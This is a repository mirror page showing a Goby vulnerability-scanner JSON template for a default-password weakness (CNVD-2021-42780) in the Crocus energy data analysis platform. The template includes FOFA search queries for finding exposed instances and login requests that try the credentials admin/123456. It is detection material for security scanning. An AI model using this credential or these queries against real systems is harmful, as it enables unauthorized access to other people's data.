qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/Crocus-default-password-vul...

149 lines
4.4 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "Crocus default password vulnerability",
"Description": "<p>Crocus is an energy data analysis platform</p><p> crocus has a weak password vulnerability, which can be used by attackers to obtain sensitive information.</p>",
"Product": "Crocus",
"Homepage": "https://crocus.ai/",
"DisclosureDate": "2021-12-02",
"Author": "9429658@qq.com",
"FofaQuery": "title=\"Crocus\" && body=\"ThirdResource\"",
"GobyQuery": "title=\"Crocus\" && body=\"ThirdResource\"",
"Level": "2",
"Impact": "<p>crocus has a weak password vulnerability, which can be used by attackers to obtain sensitive information.</p>",
"Recommendation": "<p>Modify the system administrator password to prevent malicious login.</p>",
"Translation": {
"CN": {
"Name": "Crocus 数据分析平台默认口令漏洞",
"Product": "Crocus",
"Tags": [
"默认口令"
],
"Description": "<p>Crocus是一款能源数据分析平台。</p><p>Crocus存在弱口令漏洞攻击者可利用该漏洞获取敏感信息。</p>",
"Impact": "<p>Crocus存在弱口令漏洞攻击者可利用该漏洞获取敏感信息<br></p>",
"Recommendation": "<p>修改系统管理员口令,防止恶意登录。</p>",
"VulType": [
"默认口令"
]
}
},
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": false,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/Plugin/RegisterLogin/Default.jsp",
"follow_redirect": true,
"header": {
"Accept": "application/json, text/javascript, */*; q=0.01",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Connection": "close"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"ck|lastheader|regex|JSESSIONID=(.*?);"
]
},
{
"Request": {
"method": "POST",
"uri": "/RegisterLogin.do?Action=Login",
"follow_redirect": true,
"header": {
"Accept": "application/json, text/javascript, */*; q=0.01",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cookie": "JSESSIONID={{{ck}}};",
"Connection": "close"
},
"data_type": "text",
"data": "UserName=admin&Password=123456&MailCode=&AuthCode="
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "\"Result\":true",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "\"Code\":200",
"bz": ""
}
]
},
"SetVariable": [
"keymemo|define|variable|admin:123456",
"vulurl|define|variable|{{{scheme}}}://admin:123456@{{{hostinfo}}}/RegisterLogin.do?Action=Login"
]
}
],
"ExploitSteps": null,
"Tags": [
"default password"
],
"VulType": [
"default password"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
"CNVD-2021-42780"
],
"CVSSScore": "5.5",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink